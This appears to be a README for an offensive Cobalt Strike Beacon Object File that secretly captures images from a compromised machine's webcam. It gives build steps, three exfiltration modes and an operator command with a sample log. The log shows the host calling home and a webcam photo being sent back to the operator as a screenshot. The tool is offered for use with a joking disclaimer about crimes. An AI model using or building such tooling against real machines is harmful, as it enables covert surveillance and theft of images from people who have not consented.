Webcam capture capability for Cobalt Strike, implemented as a Beacon Object File (BOF)
- git clone the repo
- run make

- drop file to disk
- download file over beacon (Cobalt Strike only)
- download file over beacon as a screenshot (Cobalt Strike only)

- import the webcamBOF.cna script into Cobalt Strike
- use the command webcam_bof {filename} {save method 0/1/2}
beacon> webcam_bof sad.jpeg 2
[*] Running Webcam BOF by (@codex_tf2)
[+] host called home, sent: 35817 bytes
[+] received output:
[*] Initializing webcam
[+] received output:
[*] Device 0: HP 320 FHD Webcam
[+] received output:
[*] Capturing image data
[+] received output:
[*] Downloading JPEG over beacon as a screenshot
[*] received screenshot of Webcam from Admin (328kb)
Note: the following error
[*] Capturing image data
[+] received output:
[ERROR] ReadSample failed with HRESULT: 0xc00d3704
usually indicates that the webcam is currently in use.
Cobalt Strike did not originally have a built-in webcam capability, nor did open-source alternatives exist, to my knowledge. And it was a fun (not) idea.
- Webcam code from https://github.com/OV2/WebcamImage
- Save BMP to file from https://stackoverflow.com/a/60667564
- in memory download from https://github.com/anthemtotheego/CredBandit
- bitmap to jpeg from https://github.com/WKL-Sec/HiddenDesktop
Usual disclaimer here: I am not responsible for any crimes against humanity you may commit or nuclear war you may cause using this piece of poorly written code.